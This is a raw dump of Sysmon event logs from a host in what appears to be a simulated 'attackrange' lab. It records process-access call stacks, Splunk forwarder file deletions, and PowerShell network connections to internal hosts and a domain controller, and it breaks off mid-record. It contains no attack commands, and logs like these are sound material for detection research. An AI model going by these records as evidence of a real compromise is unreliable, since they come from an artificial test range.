22:01:41.477{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129218Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.477{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129217Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.477{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129216Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.477{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129215Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.477{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129214Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.477{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2200-00000000C801}1160C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129213Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.477{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2200-00000000C801}1160C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129212Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.199{B81B27B7-8445-613A-F696-03000000C801}67846872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129211Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.030{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8445-613A-F696-03000000C801}6784C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129210Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.030{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129209Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.030{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129208Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.030{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129207Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.030{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129206Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.030{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-8445-613A-F696-03000000C801}6784C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035129205Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.030{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8445-613A-F696-03000000C801}6784C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035129204Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.016{B81B27B7-8445-613A-F696-03000000C801}6784C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035129257Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:42.978{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0B1A0CC070D7AE35EEC5A4D895E12C6,SHA256=5233B086E2285DB17F864E0CE4CD9A752EFA2CAF288C8EC3EC7B0B936C2D8A09,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129256Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:42.600{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4D404A1BFDB26B6EA0A8C6A836C31634,SHA256=8895F0B6D0411338006A349B9EC56E4A8E5969CA46345A6E559532D9D06E7E41,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129258Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:43.979{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4E49D47E9B3EE86D434CFA6C4DEF2F1,SHA256=331C7F35E7F07D2C4BEA58E9959856B00EBD1C825ED2A12E76B8AA4ABB2ADB15,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129259Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:44.995{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DF58A85580DBF679B3085AB5365FBE0,SHA256=2AD793D080D607B4BB248D707CA3892C261617C15B13FF108C5F8382AD7B7CAF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129265Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:10.364{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62251-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035129264Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:10.363{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62250-false10.0.1.12-8000- 10341000x800000000000000035129263Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:45.377{B81B27B7-4012-611D-0D00-00000000C801}7925480C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2200-00000000C801}1160C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129262Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:45.377{B81B27B7-4012-611D-0D00-00000000C801}7925480C:\Windows\system32\svchost.exe{B81B27B7-5BF5-611D-6D04-00000000C801}5004C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129261Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:45.377{B81B27B7-4012-611D-0D00-00000000C801}7925480C:\Windows\system32\svchost.exe{B81B27B7-5BF5-611D-6D04-00000000C801}5004C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035129260Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:45.230{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6C28B4CBEB006F3492018579A395DA07,SHA256=03DB8696581AABA1A5A8668AD97D8A729723FAC173072FB69E24E022CA054934,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129266Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:46.045{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3B05742868EE762CBA5445AFAD619D9,SHA256=83D81F499D13FF22B3B662B5075CCB7BF58FAC7826B2152E1FAF4157DAA20407,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129267Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:47.075{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F954AD81E8C2EF2C5128CE60C95E34D,SHA256=6A268C523E33B4A32D34AB94A145D2B451C886229C8461C645561F93D6EC8035,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129268Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:48.091{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15B2A0EFB5ADE59E0212BD1DB0E5FEA1,SHA256=FB0C666C214A26B4256EA3869A2E6E488CC2C13C7E9D813B76B20F4C473B0F75,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129269Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:49.127{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=908A0CA1D600499E4D005B88FC05C9DA,SHA256=163D60413B5A9B37192FAF6B32671A8ACA7615D5FE63E4F799485F85C890EBFA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035129272Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:50.225{B81B27B7-4012-611D-0B00-00000000C801}636288C:\Windows\system32\lsass.exe{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129271Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:50.225{B81B27B7-4012-611D-0B00-00000000C801}636288C:\Windows\system32\lsass.exe{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035129270Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:50.141{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0424D7169D29C271C2EF2EC256A57A9F,SHA256=2C9D01B9A9E4BA29903B24A8D2DB7E3202D1F52D9C778705AE709414EFA4E64A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129280Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:16.569{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsefalse10.0.1.15win-host-987.attackrange.local57150-false10.0.1.14WIN-DC-12853domain 354300x800000000000000035129279Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:16.569{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10f:3433:3933:28d1:a286:81df:ffff-57150-truea00:10e:81df:ffff:31e:b81f:1f8:ffff-53domain 354300x800000000000000035129278Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:16.526{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62254-false10.0.1.14WIN-DC-128389ldap 354300x800000000000000035129277Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:16.373{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62253-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035129276Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:16.372{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62252-false10.0.1.12-8000- 23542300x800000000000000035129275Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:51.719{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A12F04085FEBC65CEB440B2C52301324,SHA256=B7810465B05B5B986A60356C24D1185987FDDCFFDBF4B59F545B7847DC6C3A03,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129274Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:51.588{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 